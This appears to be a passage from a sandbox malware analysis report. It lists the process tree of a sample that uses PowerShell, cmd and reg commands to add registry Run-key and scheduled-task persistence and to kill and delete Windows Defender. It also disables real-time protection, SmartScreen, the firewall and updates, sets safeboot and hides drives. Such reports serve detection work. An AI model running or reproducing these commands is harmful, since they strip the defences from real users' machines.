  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SYSTEM\CurrentControlSet\Services' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "lockwin" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\ujv1imdb.ufr.exe" /rl LIMITED /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5436
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthSystray.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3968
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthSystray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthService.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthService.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:32
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MsMpEng.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3452
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im NisSrv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im NisSrv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SmartScreen.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SmartScreen.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im mrt.exe
  2⤵
  PID:1248
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im mrt.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5704
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:720
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3256
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\MsMpEng.exe"
  2⤵
  PID:1404
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\mrt.exe"
  2⤵
  PID:3848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\NisSrv.exe"
  2⤵
  PID:1492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
  2⤵
  PID:3904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
  2⤵
  PID:3236
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
    3⤵
    PID:4232
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:4052
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    PID:5856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -SubmitSamplesConsent 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:4200
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:3036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
  2⤵
  PID:3624
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:2356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -MAPSReporting Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5584
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:2188
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:208
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:5024
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:228
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
  2⤵
  PID:224
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableOnAccessProtection $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6128
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:3140
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:2016
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
    3⤵
    PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ProcessMitigation -System -Disable KernelModeCodeIntegrity"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:2572
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3452
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:3792
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:4188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  PID:5304
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:5284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
  2⤵
  PID:5136
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
    3⤵
    PID:3400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name 'NoAutoUpdate' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} safeboot minimal
  2⤵
  PID:5260
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {current} safeboot minimal
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:6100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:4620
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:1588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:732
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
    3⤵
    PID:5268
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:3036
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:1476
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
  2⤵
  PID:5976
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
    3⤵
    PID:1484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' -Name 'Notification_Suppress' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
  2⤵
  PID:1148
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy' -Name 'DisableNotifications' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4992
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im OneDrive.exe & %SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall
  2⤵
  PID:1192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OneDrive.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4852
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4876
  - - C:\Windows\SysWOW64\OneDriveSetup.exe
      "C:\Windows\SysWOW64\OneDriveSetup.exe" C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /permachine /childprocess /silent /enableOMCTelemetry /enableExtractCabV2 /cusid:S-1-5-21-3975168204-1612096350-4002976354-1000
      4⤵
      System Location Discovery: System Language Discovery
      PID:5608
  - - C:\Windows\SysWOW64\OneDriveSetup.exe
      C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /peruser /childprocess /enableOMCTelemetry /enableExtractCabV2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:3188
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:100
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
    3⤵
    PID:216
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:3296
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:3332
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:4684
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:2908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableNetworkProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:4024
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:1800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:4540
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:4156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:536
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:32
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:1804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -PUAProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
  2⤵
  PID:3520
- - C:\Windows\system32\sc.exe
    sc delete WinDefend
    3⤵
    - Launches sc.exe
    PID:3808
- C:\Windows\System32\cmd.exe
